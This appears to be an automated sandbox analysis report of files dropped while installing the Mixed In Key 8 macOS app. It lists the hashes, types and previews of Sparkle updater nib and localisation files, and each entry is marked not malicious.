SHA-512:	EF169109DD9C9EFBACFBE30AF8C8E1B14B083FB79482C51E4991FDD8C08E8079AEA2FC0B2B7D62C46E7305F212EE89A8DDACE25675B7D13BF388AD489FC58362
Malicious:	false
Preview:	bplist00.................X$versionX$objectsY$archiverT$top...............#.$.*...2.=.E.g.h.i.j.k.w..................................................................... .$.'.,.-.2.6.9.B.C.J.O.P.].`.a.b.v.w.{...................................................................................................$.%.&.-.../.D.G.H.J._.}.f.b........................................................U$null.............................................VNSRoot]NSConnections\NSOidsValues_..NSObjectsValues]NSObjectsKeys_..NSAccessibilityOidsValues_..NSVisibleWindows_..NSAccessibilityOidsKeys_..NSAccessibilityConnectorsV$classZNSOidsKeys.........\|.............. ...!."[NSClassName...._..SUAutomaticUpdateAlert..%.&.'.(Z$classnameX$classes^NSCustomObject..'.)XNSObject..+...,.-ZNS.objects.....%.&./.0\NSMutableSet../.1.)UNSSet..+...3.<..4.5.6.7.8.9.:.;...e.h.j.l.s.v.y....>.?.@.....B.C.DXNSSource]NSDestinationWNSLabel.....c.d....F.G.H.I.J.K.L.M.N.O...P.Q.R.S.T.U.V.W.X.Y.Z.[.\.].]._.`.a.b.c.d.W.f\NSWindowRect_..N

/private/var/folders/zz/zyxvpxvq6csfxvn_n0000000000000/C/PKInstallSandboxManager/C4D9EA0D-14AA-4D29-838E-1D6070C50BA9.activeSandbox/Root/Applications/Mixed In Key 8.app/Contents/Frameworks/MIKUpdate.framework/Versions/A/Frameworks/Sparkle.framework/Versions/A/Resources/da.lproj/.BC.T_JGmV6u Download File
Process:	/System/Library/PrivateFrameworks/PackageKit.framework/Resources/installd
File Type:	Little-endian UTF-16 Unicode text, with very long lines
Category:	dropped
Size (bytes):	7258
Entropy (8bit):	3.3997309241312994
Encrypted:	false
SSDEEP:	96:M4CIit+xUiXV38iyOUyQ/KAywdCPTKynPYl7/muBwj27VnWwCXG65Wr2ivcJhMMy:MpiF38xPyAnPcWgJBkqeU42E
MD5:	537F612AC0974A57B8F57D5A4B189801
SHA1:	FC8C025848DA6ECF7E5CF0B69299D5601708B005
SHA-256:	0820D6181FE5D2BD0FDCAE86BDC14C850E24B115ECAC991FF1F9E53E2BE5A745
SHA-512:	A9AE641243EE255204542624E89B693F8E685F7351EE0AC1D1FA75ECB75A7180416AC260C18549C3EFB9E8DCB03058F3CA9D4433D7FE9832982AEA7E86F28336
Malicious:	false
Preview:	..".%.1.$.@. .%.2.$.@. .h.a.s. .b.e.e.n. .d.o.w.n.l.o.a.d.e.d. .a.n.d. .i.s. .r.e.a.d.y. .t.o. .u.s.e.!. .W.o.u.l.d. .y.o.u. .l.i.k.e. .t.o. .i.n.s.t.a.l.l. .i.t. .a.n.d. .r.e.l.a.u.n.c.h. .%.1.$.@. .n.o.w.?.". .=. .".%.1.$.@. .%.2.$.@. .e.r. .h.e.n.t.e.t. .o.g. .k.l.a.r. .t.i.l. .b.r.u.g.!. .V.i.l. .d.u. .i.n.s.t.a.l.l.e.r.e. .o.g. .g.e.n.s.t.a.r.t.e. .%.1.$.@. .n.u.?.".;.....".%.1.$.@. .c.a.n.'.t. .b.e. .u.p.d.a.t.e.d. .w.h.e.n. .i.t.'.s. .r.u.n.n.i.n.g. .f.r.o.m. .a. .r.e.a.d.-.o.n.l.y. .v.o.l.u.m.e. .l.i.k.e. .a. .d.i.s.k. .i.m.a.g.e. .o.r. .a.n. .o.p.t.i.c.a.l. .d.r.i.v.e... .M.o.v.e. .%.1.$.@. .t.o. .y.o.u.r. .A.p.p.l.i.c.a.t.i.o.n.s. .f.o.l.d.e.r.,. .r.e.l.a.u.n.c.h. .i.t. .f.r.o.m. .t.h.e.r.e.,. .a.n.d. .t.r.y. .a.g.a.i.n...". .=. .".%.1.$.@. .k.a.n. .i.k.k.e. .o.p.d.a.t.e.r.e.s. .n...r. .d.e.t. .k...r.e.s. .f.r.a. .e.n. .k.u.n. .l...s.b.a.r. .e.n.h.e.d... .F.l.y.t. .%.1.$.@. .t.i.l. .m.a.p.p.e.n. .P.r.o.g.r.a.m.m.e.r.,. .g.e.n.s.t.a.r.t. .d.e.r.f.r.a. .o.g. .p.r...v. .i.g.e.n.

/private/var/folders/zz/zyxvpxvq6csfxvn_n0000000000000/C/PKInstallSandboxManager/C4D9EA0D-14AA-4D29-838E-1D6070C50BA9.activeSandbox/Root/Applications/Mixed In Key 8.app/Contents/Frameworks/MIKUpdate.framework/Versions/A/Frameworks/Sparkle.framework/Versions/A/Resources/da.lproj/.BC.T_Q7Sctg Download File
Process:	/System/Library/PrivateFrameworks/PackageKit.framework/Resources/installd
File Type:	Apple binary property list
Category:	dropped
Size (bytes):	15759
Entropy (8bit):	6.805944042471916
Encrypted:	false
SSDEEP:	384:yyggfE0NeEYNg7ns2OFjWJtjGDrOUPVU/FVs2t9:jggveEYyDSjWJlGNIFVs23
MD5:	67C0B91D3248F0FB5D290C5AEA274773
SHA1:	E70B103D320E6419128D37B929CED3185A8CB155
SHA-256:	9BC86FBDDDDBCA9170DEBA76A5C886BFB37CB8BE68E5EC49738DA81C557E7654
SHA-512:	142329D8328E496746A83D053123EBE7DC292F6F788C778BA1869F5D2EFF877999EACD5D00A420A86F7E0A0E2A4B9997306D9600CACFF3E5DD65DC46A9D2D2F5
Malicious:	false
Preview:	bplist00.................X$versionX$objectsY$archiverT$top................#.$....2.G.O.c.l.m.}.~.....................................................................#.&.'./.0.1.2.7.L.S.f.g.h.i.j.k.l.m.n.o.p.q.r.s.t.u.v...w.x.~.........b.............................................................$..+.,./.2.5.>.?.G.K.L.U.V.].^.b.w.{...........................................................................................................".#.$.*.2.3.4.:.B.C.D.J.Q.R.S.Z.[.\.v.y.z.\|.....r.a......................................................................................U$null.............................................VNSRoot]NSConnections\NSOidsValues_..NSObjectsValues]NSObjectsKeys_..NSAccessibilityOidsValues_..NSVisibleWindows_..NSAccessibilityOidsKeys_..NSAccessibilityConnectorsV$classZNSOidsKeys..................... ...!."[NSClassName....]SUUpdateAlert..%.&.'.(Z$classnameX$classes^NSCustomObject..'.)XNSObject..+...,.-ZNS.objects.....%.&./.0\NSMutableSet../.1.)UNSSet..+...3.

/private/var/folders/zz/zyxvpxvq6csfxvn_n0000000000000/C/PKInstallSandboxManager/C4D9EA0D-14AA-4D29-838E-1D6070C50BA9.activeSandbox/Root/Applications/Mixed In Key 8.app/Contents/Frameworks/MIKUpdate.framework/Versions/A/Frameworks/Sparkle.framework/Versions/A/Resources/da.lproj/.BC.T_Tr7UdS Download File
Process:	/System/Library/PrivateFrameworks/PackageKit.framework/Resources/installd
File Type:	Apple binary property list
Category:	dropped
Size (bytes):	18288
Entropy (8bit):	6.830310630492426
Encrypted:	false
SSDEEP:	384:ZgZpE0DeEYNg7uH4+U3NAKAswd17h3u11lfLbP8YU/8oWuSgBDinVT:ZgZDeEYy+KAJRylfH4/8oBBAJ
MD5:	D942DF17DBFE9994B2FF40D113F4DD30
SHA1:	4398DFD10E7D52C78E9F5659B70DEB6E19C32D23
SHA-256:	89B90C9410059800D38C02971DDA34251461206810E6419E19038FF19BBEC997
SHA-512:	CDD5F011ABEA2F54B3509794DED0ACCB6DADD739629374B872DB34F6B798794D3D88CF0E3246EA5A9547D1EFE0C87645780CE3A217A799F84671034CBA246E93
Malicious:	false
Preview:	bplist00.................X$versionX$objectsY$archiverT$top................#.$.*...2.E.M.a.j.k.{.\|.......................................................................7.=.M.Q.z.{...........................................................................%.&.+.-.0.9.:.A.B.C.D.G.H.M.N.S.s.t.u.v...................................................................................%.+.,.-.0.3.6.7.9.:.;.<.=.@.A.F.G.K.P.Q.V.W.c.d.e.f.m.n.o.r.v.}...............................................x.`.........................................A.t._...e..............................................................................................U$null.............................................VNSRoot]NSConnections\NSOidsValues_..NSObjectsValues]NSObjectsKeys_..NSAccessibilityOidsValues_..NSVisibleWindows_..NSAccessibilityOidsKeys_..NSAccessibilityConnectorsV$classZNSOidsKeys......................... ...!."[NSClassName...._..SUUpdatePermissionPrompt..%.&.'.(Z$classnameX$classes^NSCustomObject..'.)XNSO

/private/var/folders/zz/zyxvpxvq6csfxvn_n0000000000000/C/PKInstallSandboxManager/C4D9EA0D-14AA-4D29-838E-1D6070C50BA9.activeSandbox/Root/Applications/Mixed In Key 8.app/Contents/Frameworks/MIKUpdate.framework/Versions/A/Frameworks/Sparkle.framework/Versions/A/Resources/da.lproj/.BC.T_WP9ith Download File
Process:	/System/Library/PrivateFrameworks/PackageKit.framework/Resources/installd
File Type:	Apple binary property list
Category:	dropped
Size (bytes):	11180
Entropy (8bit):	6.725807843539839
Encrypted:	false
SSDEEP:	192:Ee1WI1xpDOTYE0lrjeEYNMtKwQN4PIooL8+qJU32dTN3tVWKvD:Eeg2pDXE0ZeEYNg7QN4wRdqxdd/X
MD5:	53F130FD5A30B191D5FBF9A6367FA439
SHA1:	AA3E2548480EC8C68169EFFA07A9EB7CCF11B990
SHA-256:	8D8ACC5B88CD4AA6818E612A253BA76E7D5797E9C38BC9B1566C797B4FB1DB9D
SHA-512:	18901D5C8D6D9656BC72C451B2677652EED91DAE8687EF43B5D6A96814C7962840FDADA1EB54D3AE1B3F1777A752165C0DAB4D51A44CB0FA296682E80183BE2F
Malicious:	false
Preview:	bplist00..............h.iX$versionX$objectsY$archiverT$top...............#.$.*...2.;.C.].e.h.l.x.y.z.{.\|.}.~.........................................................................&.'.0.1.5.6.;.<.A.F.G.I.K.L.Q.n.o.p.q.z.........................................................................4.m.....M.N...O.P.Q.R.S.T.U.V.W.X.Y.Z.[.\.].^._.b.eU$null.............................................VNSRoot]NSConnections\NSOidsValues_..NSObjectsValues]NSObjectsKeys_..NSAccessibilityOidsValues_..NSVisibleWindows_..NSAccessibilityOidsKeys_..NSAccessibilityConnectorsV$classZNSOidsKeys.....q.o.l...........p.. ...!."[NSClassName...._..SUPasswordPrompt..%.&.'.(Z$classnameX$classes^NSCustomObject..'.)XNSObject..+...,.-ZNS.objects.....%.&./.0\NSMutableSet../.1.)UNSSet..+...3.:..4.5.6.7.8.9.....7.F.g.j....<.=.>.....@.A.BXNSSource]NSDestinationWNSLabel..........D.E.F.G.H.I.J.K...L.M.N.O.P.Q.R.S.T.U.P.T.X.Y.Z.[.YYNSEnabledWNSFrame_..NSAllowsLogicalLayoutDirectionVNSCell[NSSuperviewXNSvFlagsZNSEditable_..

/private/var/folders/zz/zyxvpxvq6csfxvn_n0000000000000/C/PKInstallSandboxManager/C4D9EA0D-14AA-4D29-838E-1D6070C50BA9.activeSandbox/Root/Applications/Mixed In Key 8.app/Contents/Frameworks/MIKUpdate.framework/Versions/A/Frameworks/Sparkle.framework/Versions/A/Resources/de.lproj/.BC.T_0gjA37 Download File
Process:	/System/Library/PrivateFrameworks/PackageKit.framework/Resources/installd
File Type:	Apple binary property list
Category:	dropped
Size (bytes):	12137
Entropy (8bit):	6.74003869249438
Encrypted:	false
SSDEEP:	192:zK1WxXvQOLmjE0lTjeEYNMtKwC/4IRe8ys7sK5wNCZ/scX/cAQZPu0u:zKgxXvQwmjE0NeEYNg7C/4IRe8yWsfY/
MD5:	6662F3551389B0A978D44E0B6509D6B8
SHA1:	DBEB2A41E270DC7FCB2D698EA40D9D090A063A46
SHA-256:	CC1B0DEAC66D802D80DB34C9CCB1647697E218B5BFD24D19ABB280BA0F5861E3
SHA-512:	F6AA35C3C20A0584D894261D3391635CA0578C2319D7DEB375B270F83041168E2520D223B4EA35A055B1A4D699464E63B41726AB3A2F71F18639A05A275B9497
Malicious:	false
Preview:	bplist00.................X$versionX$objectsY$archiverT$top...............#.$.*...2.=.E.g.h.i.j.k.w..................................................................... .$.'.,.-.2.6.9.B.C.J.O.P.].`.a.b.v.w.{...................................................................................................$.%.&.-.../.D.G.H.J._.}.f.b........................................................U$null.............................................VNSRoot]NSConnections\NSOidsValues_..NSObjectsValues]NSObjectsKeys_..NSAccessibilityOidsValues_..NSVisibleWindows_..NSAccessibilityOidsKeys_..NSAccessibilityConnectorsV$classZNSOidsKeys.........\|.............. ...!."[NSClassName...._..SUAutomaticUpdateAlert..%.&.'.(Z$classnameX$classes^NSCustomObject..'.)XNSObject..+...,.-ZNS.objects.....%.&./.0\NSMutableSet../.1.)UNSSet..+...3.<..4.5.6.7.8.9.:.;...e.h.j.l.s.v.y....>.?.@.....B.C.DXNSSource]NSDestinationWNSLabel.....c.d....F.G.H.I.J.K.L.M.N.O...P.Q.R.S.T.U.V.W.X.Y.Z.[.\.].]._.`.a.b.c.d.W.f\NSWindowRect_..N

/private/var/folders/zz/zyxvpxvq6csfxvn_n0000000000000/C/PKInstallSandboxManager/C4D9EA0D-14AA-4D29-838E-1D6070C50BA9.activeSandbox/Root/Applications/Mixed In Key 8.app/Contents/Frameworks/MIKUpdate.framework/Versions/A/Frameworks/Sparkle.framework/Versions/A/Resources/de.lproj/.BC.T_bW8QPK Download File
Process:	/System/Library/PrivateFrameworks/PackageKit.framework/Resources/installd
File Type:	Little-endian UTF-16 Unicode text, with very long lines
Category:	dropped
Size (bytes):	7298
Entropy (8bit):	3.4090905037860706
Encrypted:	false
SSDEEP:	96:M4YCFRt+W45x3GoiFOcTwTd7TlT3DmlRQz2nj0Yp6g0TwIQMv/NJzHwQLM27f:Mx39k2KLnj0FqQ42z
MD5:	4F97FF9E89D2E8AD43F65514CFA603CD
SHA1:	42D5F197D583C33555C57AD2BC4718C738189E9F
SHA-256:	A97167AD065580BD61930C65CE47278E17C331B19CF035E3B94BD9ED56BEE173
SHA-512:	350CE251B878E3FDF01797E6EC1594E44E0483FA4D0475494D0DEE5565DF7317280B792AD0C861D26C0E6FABF45F6DC466DD72527A7146BD99788DEC7793CA4E
Malicious:	false
Preview:	..".%.1.$.@. .%.2.$.@. .h.a.s. .b.e.e.n. .d.o.w.n.l.o.a.d.e.d. .a.n.d. .i.s. .r.e.a.d.y. .t.o. .u.s.e.!. .W.o.u.l.d. .y.o.u. .l.i.k.e. .t.o. .i.n.s.t.a.l.l. .i.t. .a.n.d. .r.e.l.a.u.n.c.h. .%.1.$.@. .n.o.w.?.". .=. .".%.1.$.@. .%.2.$.@. .w.u.r.d.e. .h.e.r.u.n.t.e.r.g.e.l.a.d.e.n. .u.n.d. .s.t.e.h.t. .z.u.r. .V.e.r.w.e.n.d.u.n.g. .b.e.r.e.i.t.!. .M...c.h.t.e.n. .S.i.e. .%.1.$.@. .j.e.t.z.t. .d.u.r.c.h. .d.i.e. .n.e.u.e. .V.e.r.s.i.o.n. .e.r.s.e.t.z.e.n. .u.n.d. .n.e.u. .s.t.a.r.t.e.n.?.".;.....".%.1.$.@. .c.a.n.'.t. .b.e. .u.p.d.a.t.e.d. .w.h.e.n. .i.t.'.s. .r.u.n.n.i.n.g. .f.r.o.m. .a. .r.e.a.d.-.o.n.l.y. .v.o.l.u.m.e. .l.i.k.e. .a. .d.i.s.k. .i.m.a.g.e. .o.r. .a.n. .o.p.t.i.c.a.l. .d.r.i.v.e... .M.o.v.e. .%.1.$.@. .t.o. .y.o.u.r. .A.p.p.l.i.c.a.t.i.o.n.s. .f.o.l.d.e.r.,. .r.e.l.a.u.n.c.h. .i.t. .f.r.o.m. .t.h.e.r.e.,. .a.n.d. .t.r.y. .a.g.a.i.n...". .=. .".%.1.$.@. .k.a.n.n. .n.i.c.h.t. .a.k.t.u.a.l.i.s.i.e.r.t. .w.e.r.d.e.n.,. .w.e.n.n. .e.s. .v.o.n. .e.i.n.e.m. .V.o.l.u.m.e.n. .o.h.

/private/var/folders/zz/zyxvpxvq6csfxvn_n0000000000000/C/PKInstallSandboxManager/C4D9EA0D-14AA-4D29-838E-1D6070C50BA9.activeSandbox/Root/Applications/Mixed In Key 8.app/Contents/Frameworks/MIKUpdate.framework/Versions/A/Frameworks/Sparkle.framework/Versions/A/Resources/de.lproj/.BC.T_lNG5I7 Download File
Process:	/System/Library/PrivateFrameworks/PackageKit.framework/Resources/installd
File Type:	Apple binary property list
Category:	dropped
Size (bytes):	15618
Entropy (8bit):	6.808664356724031
Encrypted:	false
SSDEEP:	384:dgTfE0NeEYNg7ns2OFXcJtSw3HAuUO29lxI:dgTveEYyDSXcJvs1a
MD5:	F614CD0AB3FCB374A67975A58889F383
SHA1:	EF77C856A2307879CA1F54821031F931AA0358D4
SHA-256:	DFE265B45917A2A442BCF8850814838761E18EF9BF449DE0612C16E2120D585E
SHA-512:	3D529EAE731763EA0FDE991093275B7FCE3CAACD5519C63D8CE7FA5919EDE60AFBADB9F9F9E5F9245C576E8D97B3687F6C677C8FD933B7BAFF3E545CE1B8F76B
Malicious:	false
Preview:	bplist00.................X$versionX$objectsY$archiverT$top...............#.$.*...2.G.O.c.l.m.}.~.....................................................................#.&.'./.0.1.2.7.L.S.f.g.h.i.j.k.l.m.n.o.p.q.r.s.t.u.v...w.x.~.....................................................................".%.(.1.2.:.>.?.H.I.P.Q.U.j.n.r.s.u.v.w.}.......................................................................................................%.&.'.-.5.6.7.=.D.E.F.M.N.O.i.l.m.o.....e.a......................................................................................U$null.............................................VNSRoot]NSConnections\NSOidsValues_..NSObjectsValues]NSObjectsKeys_..NSAccessibilityOidsValues_..NSVisibleWindows_..NSAccessibilityOidsKeys_..NSAccessibilityConnectorsV$classZNSOidsKeys..................... ...!."[NSClassName....]SUUpdateAlert..%.&.'.(Z$classnameX$classes^NSCustomObject..'.)XNSObject..+...,.-ZNS.objects.....%.&./.0\NSMutableSet../.1.)UNSSet..+...3.F....4.5.6.

/private/var/folders/zz/zyxvpxvq6csfxvn_n0000000000000/C/PKInstallSandboxManager/C4D9EA0D-14AA-4D29-838E-1D6070C50BA9.activeSandbox/Root/Applications/Mixed In Key 8.app/Contents/Frameworks/MIKUpdate.framework/Versions/A/Frameworks/Sparkle.framework/Versions/A/Resources/de.lproj/.BC.T_nMz5PE Download File
Process:	/System/Library/PrivateFrameworks/PackageKit.framework/Resources/installd
File Type:	Apple binary property list
Category:	dropped
Size (bytes):	18446
Entropy (8bit):	6.789743135390899
Encrypted:	false
SSDEEP:	384:ZgZpE0DeEYNg7uH4+53NAKAsif17h/Wv1lflbP8YU/8oWuSgBviDu:ZgZDeEYyZKAdRAlfZ4/8oBB5
MD5:	0D760E3D8E8D763EEBFD462A4B1ADDB0
SHA1:	EB91B69C1FAF8BB9C7CAEC56AA3DC3BB614237CE
SHA-256:	02CFF0F4C9C19207B50E73F7EAF8F7A51E6883B511F17A04D1DD98335C5DF790
SHA-512:	845347571F442F28B103CFC4B9168B96BAECB4BD8D26B526F1706767F094C0B82714EC9B1CF5908B4A92B449041DC0B140194A25C4ADFAAE67DDC5C875772770
Malicious:	false
Preview:	bplist00.................X$versionX$objectsY$archiverT$top................#.$.*...2.E.M.a.j.k.{.\|.......................................................................7.=.M.Q.z.{...........................................................................%.&.+.-.0.9.:.A.B.C.D.G.H.M.N.S.s.t.u.v...................................................................................%.+.,.-.0.3.6.7.9.:.;.<.=.@.A.F.G.K.P.Q.V.W.c.d.e.f.m.n.o.r.v.}...............................................x.`.........................................A.t._...e..............................................................................................U$null.............................................VNSRoot]NSConnections\NSOidsValues_..NSObjectsValues]NSObjectsKeys_..NSAccessibilityOidsValues_..NSVisibleWindows_..NSAccessibilityOidsKeys_..NSAccessibilityConnectorsV$classZNSOidsKeys......................... ...!."[NSClassName...._..SUUpdatePermissionPrompt..%.&.'.(Z$classnameX$classes^NSCustomObject..'.)XNSO

/private/var/folders/zz/zyxvpxvq6csfxvn_n0000000000000/C/PKInstallSandboxManager/C4D9EA0D-14AA-4D29-838E-1D6070C50BA9.activeSandbox/Root/Applications/Mixed In Key 8.app/Contents/Frameworks/MIKUpdate.framework/Versions/A/Frameworks/Sparkle.framework/Versions/A/Resources/en.lproj/.BC.T_2hs0NC Download File
Process:	/System/Library/PrivateFrameworks/PackageKit.framework/Resources/installd
File Type:	Little-endian UTF-16 Unicode text, with very long lines
Category:	dropped
Size (bytes):	8226
Entropy (8bit):	3.3874847820358407
Encrypted:	false
SSDEEP:	192:M0Kbb3t3XGmbC1L+HnfTnBQvAJTkWj425:GrBQvAJTkWl5
MD5:	04549C0E76D397177FBDD2CCEE2DFF79
SHA1:	CF3324F5FBC63CC9CD5005D757FFA39D8267CE21
SHA-256:	3077FA2F5371455C3386B72F481A055B3705901F74B896AA50BC4661D149D268
SHA-512:	2CD126E1C23D5D579B8DC907D0235785DF09D8F4CC0AA0A927BE7540F78A82328016D26D99E1123A462C07676128D5720096A63C6D7BBC93D6ACB17881E4A597
Malicious:	false
Preview:	..".%.1.$.@. .%.2.$.@. .h.a.s. .b.e.e.n. .d.o.w.n.l.o.a.d.e.d. .a.n.d. .i.s. .r.e.a.d.y. .t.o. .u.s.e.!. .T.h.i.s. .i.s. .a.n. .i.m.p.o.r.t.a.n.t. .u.p.d.a.t.e.;. .w.o.u.l.d. .y.o.u. .l.i.k.e. .t.o. .i.n.s.t.a.l.l. .i.t. .a.n.d. .r.e.l.a.u.n.c.h. .%.1.$.@. .n.o.w.?.". .=. .".%.1.$.@. .%.2.$.@. .h.a.s. .b.e.e.n. .d.o.w.n.l.o.a.d.e.d. .a.n.d. .i.s. .r.e.a.d.y. .t.o. .u.s.e.!. .T.h.i.s. .i.s. .a.n. .i.m.p.o.r.t.a.n.t. .u.p.d.a.t.e.;. .w.o.u.l.d. .y.o.u. .l.i.k.e. .t.o. .i.n.s.t.a.l.l. .i.t. .a.n.d. .r.e.l.a.u.n.c.h. .%.1.$.@. .n.o.w.?.".;.....".%.1.$.@. .%.2.$.@. .h.a.s. .b.e.e.n. .d.o.w.n.l.o.a.d.e.d. .a.n.d. .i.s. .r.e.a.d.y. .t.o. .u.s.e.!. .W.o.u.l.d. .y.o.u. .l.i.k.e. .t.o. .i.n.s.t.a.l.l. .i.t. .a.n.d. .r.e.l.a.u.n.c.h. .%.1.$.@. .n.o.w.?.". .=. .".%.1.$.@. .%.2.$.@. .h.a.s. .b.e.e.n. .d.o.w.n.l.o.a.d.e.d. .a.n.d. .i.s. .r.e.a.d.y. .t.o. .u.s.e.!. .W.o.u.l.d. .y.o.u. .l.i.k.e. .t.o. .i.n.s.t.a.l.l. .i.t. .a.n.d. .r.e.l.a.u.n.c.h. .%.1.$.@. .n.o.w.?.".;.....".%.1.$.@. .c.a.n.'.t. .b.

/private/var/folders/zz/zyxvpxvq6csfxvn_n0000000000000/C/PKInstallSandboxManager/C4D9EA0D-14AA-4D29-838E-1D6070C50BA9.activeSandbox/Root/Applications/Mixed In Key 8.app/Contents/Frameworks/MIKUpdate.framework/Versions/A/Frameworks/Sparkle.framework/Versions/A/Resources/en.lproj/.BC.T_LRDebd Download File
Process:	/System/Library/PrivateFrameworks/PackageKit.framework/Resources/installd
File Type:	Apple binary property list
Category:	dropped
Size (bytes):	18219
Entropy (8bit):	6.836115477561288
Encrypted:	false
SSDEEP:	384:ZgZpE0DeEYNg7uH4+U3NAKAswd17h8MN1lflbP8YU/8oWuSgBx/S:ZgZDeEYy+KAJRhlfZ4/8oBBtS
MD5:	D06B1FFE30C501D384D1BCFF3C87DFAB
SHA1:	BC5EA11BBE0145A1E71E1040D287749EB62F8148
SHA-256:	950E5F954554EED5129016CE224D9740665F30702CBAD50D3AB330D2D4B22F08
SHA-512:	0C1C9B1A27D748192ECE95622191B203A762DFA71908DFCD1C52856D7DA900AF14BA9EB8667F8A5EFA3F2DDFD5F2FB28F58ECC1DFD0A30258DFBAAFC4A5F66C2
Malicious:	false
Preview:	bplist00.................X$versionX$objectsY$archiverT$top................#.$.*...2.E.M.a.j.k.{.\|.......................................................................7.=.M.Q.z.{...........................................................................%.&.+.-.0.9.:.A.B.C.D.G.H.M.N.S.s.t.u.v...................................................................................%.+.,.-.0.3.6.7.9.:.;.<.=.@.A.F.G.K.P.Q.V.W.c.d.e.f.m.n.o.r.v.}...............................................x.`.........................................A.t._...e..............................................................................................U$null.............................................VNSRoot]NSConnections\NSOidsValues_..NSObjectsValues]NSObjectsKeys_..NSAccessibilityOidsValues_..NSVisibleWindows_..NSAccessibilityOidsKeys_..NSAccessibilityConnectorsV$classZNSOidsKeys......................... ...!."[NSClassName...._..SUUpdatePermissionPrompt..%.&.'.(Z$classnameX$classes^NSCustomObject..'.)XNSO

/private/var/folders/zz/zyxvpxvq6csfxvn_n0000000000000/C/PKInstallSandboxManager/C4D9EA0D-14AA-4D29-838E-1D6070C50BA9.activeSandbox/Root/Applications/Mixed In Key 8.app/Contents/Frameworks/MIKUpdate.framework/Versions/A/Frameworks/Sparkle.framework/Versions/A/Resources/en.lproj/.BC.T_akJC27 Download File
Process:	/System/Library/PrivateFrameworks/PackageKit.framework/Resources/installd
File Type:	Apple binary property list
Category:	dropped
Size (bytes):	12096
Entropy (8bit):	6.741398255604073
Encrypted:	false
SSDEEP:	192:zK1WxXoQOLgjE0lTjeEYNMtKwC/4Ire4Cs7sK5wNCZ/scX/cAQZPDTEmJ:zKgxXoQwgjE0NeEYNg7C/4IreHWsfYX+
MD5:	3E74B9207E67587FBD9A7480CFD95E74
SHA1:	0A5D7BA37D0CDE8946CE67678FDF1B1E2E8C62A2
SHA-256:	B811A81BEC13AFEB6D6582DD77DAD20C48A70B262B731758E1BDC500AD5AA88F
SHA-512:	E50BABE8CCD6050FC4A59A461F59806093A4B4573E739C564CB77ED7F4B6AED0C117CF72BB597B2C1425C0D2689EE1940DB710AF85CE942F230470B3FEE3919D
Malicious:	false
Preview:	bplist00.................X$versionX$objectsY$archiverT$top...............#.$.*...2.=.E.g.h.i.j.k.w..................................................................... .$.'.,.-.2.6.9.B.C.J.O.P.].`.a.b.v.w.{...................................................................................................$.%.&.-.../.D.G.H.J._.}.f.b........................................................U$null.............................................VNSRoot]NSConnections\NSOidsValues_..NSObjectsValues]NSObjectsKeys_..NSAccessibilityOidsValues_..NSVisibleWindows_..NSAccessibilityOidsKeys_..NSAccessibilityConnectorsV$classZNSOidsKeys.........\|.............. ...!."[NSClassName...._..SUAutomaticUpdateAlert..%.&.'.(Z$classnameX$classes^NSCustomObject..'.)XNSObject..+...,.-ZNS.objects.....%.&./.0\NSMutableSet../.1.)UNSSet..+...3.<..4.5.6.7.8.9.:.;...e.h.j.l.s.v.y....>.?.@.....B.C.DXNSSource]NSDestinationWNSLabel.....c.d....F.G.H.I.J.K.L.M.N.O...P.Q.R.S.T.U.V.W.X.Y.Z.[.\.].]._.`.a.b.c.d.W.f\NSWindowRect_..N

/private/var/folders/zz/zyxvpxvq6csfxvn_n0000000000000/C/PKInstallSandboxManager/C4D9EA0D-14AA-4D29-838E-1D6070C50BA9.activeSandbox/Root/Applications/Mixed In Key 8.app/Contents/Frameworks/MIKUpdate.framework/Versions/A/Frameworks/Sparkle.framework/Versions/A/Resources/en.lproj/.BC.T_cX3GDu Download File
Process:	/System/Library/PrivateFrameworks/PackageKit.framework/Resources/installd
File Type:	Apple binary property list
Category:	dropped
Size (bytes):	11174
Entropy (8bit):	6.729033238051354
Encrypted:	false
SSDEEP:	192:Ee1WI1xpDOT6E0lrjeEYNMtKwQN4PRooLg+qJU32dTN3t+bXe:Eeg2pD5E0ZeEYNg7QN4JRpqxdd0K
MD5:	EAE97FF0847C9901F4B8ECD0B27DD9C6
SHA1:	C18AF788CFA2FE4DB046B78607993E1AD70A3141
SHA-256:	C5B50EE11D81C566FD9766853BAACA3F07A5DACC3B2C40EA0EC731A1E74D946E
SHA-512:	9C871591E9306BF2F889C678CD39DBBE21DEA61AC420E6350910AE54935FEC4FEF06DCDE766D5D6279975D9734BCDE783282690456B7FEC111202348C97EF665
Malicious:	false
Preview:	bplist00..............h.iX$versionX$objectsY$archiverT$top...............#.$.*...2.;.C.].e.h.l.x.y.z.{.\|.}.~.........................................................................&.'.0.1.5.6.;.<.A.F.G.I.K.L.Q.n.o.p.q.z.........................................................................4.m.....M.N...O.P.Q.R.S.T.U.V.W.X.Y.Z.[.\.].^._.b.eU$null.............................................VNSRoot]NSConnections\NSOidsValues_..NSObjectsValues]NSObjectsKeys_..NSAccessibilityOidsValues_..NSVisibleWindows_..NSAccessibilityOidsKeys_..NSAccessibilityConnectorsV$classZNSOidsKeys.....q.o.l...........p.. ...!."[NSClassName...._..SUPasswordPrompt..%.&.'.(Z$classnameX$classes^NSCustomObject..'.)XNSObject..+...,.-ZNS.objects.....%.&./.0\NSMutableSet../.1.)UNSSet..+...3.:..4.5.6.7.8.9.....7.F.g.j....<.=.>.....@.A.BXNSSource]NSDestinationWNSLabel..........D.E.F.G.H.I.J.K...L.M.N.O.P.Q.R.S.T.U.P.T.X.Y.Z.[.YYNSEnabledWNSFrame_..NSAllowsLogicalLayoutDirectionVNSCell[NSSuperviewXNSvFlagsZNSEditable_..

/private/var/folders/zz/zyxvpxvq6csfxvn_n0000000000000/C/PKInstallSandboxManager/C4D9EA0D-14AA-4D29-838E-1D6070C50BA9.activeSandbox/Root/Applications/Mixed In Key 8.app/Contents/Frameworks/MIKUpdate.framework/Versions/A/Frameworks/Sparkle.framework/Versions/A/Resources/en.lproj/.BC.T_mRBf9c Download File
Process:	/System/Library/PrivateFrameworks/PackageKit.framework/Resources/installd
File Type:	Apple binary property list
Category:	dropped
Size (bytes):	15750
Entropy (8bit):	6.811351000969998
Encrypted:	false
SSDEEP:	384:yyggfE0NeEYNg7ns2OFJOWJtjGDWOAeVU/FVsxrlgiG:jggveEYyDSJOWJlGC7FVsx2iG
MD5:	80AB259DEB0C33A799C1E71D4F6EC454
SHA1:	767A5BD85321A38DFCC6427E7A1994D52ED9CC93
SHA-256:	C011F2F25471FBEAFC23C38C1F8CFD98791EF00FC14D3F218438D6E65E141029
SHA-512:	422183DA0C0C4ECB247075E0DAA617FF7F698CC980E4721C426034EC437360DAD3D44940B7BA3B1A94EC60C1ABB44AD1CAD0EE73A72860F63F9BF526B5139FBD
Malicious:	false
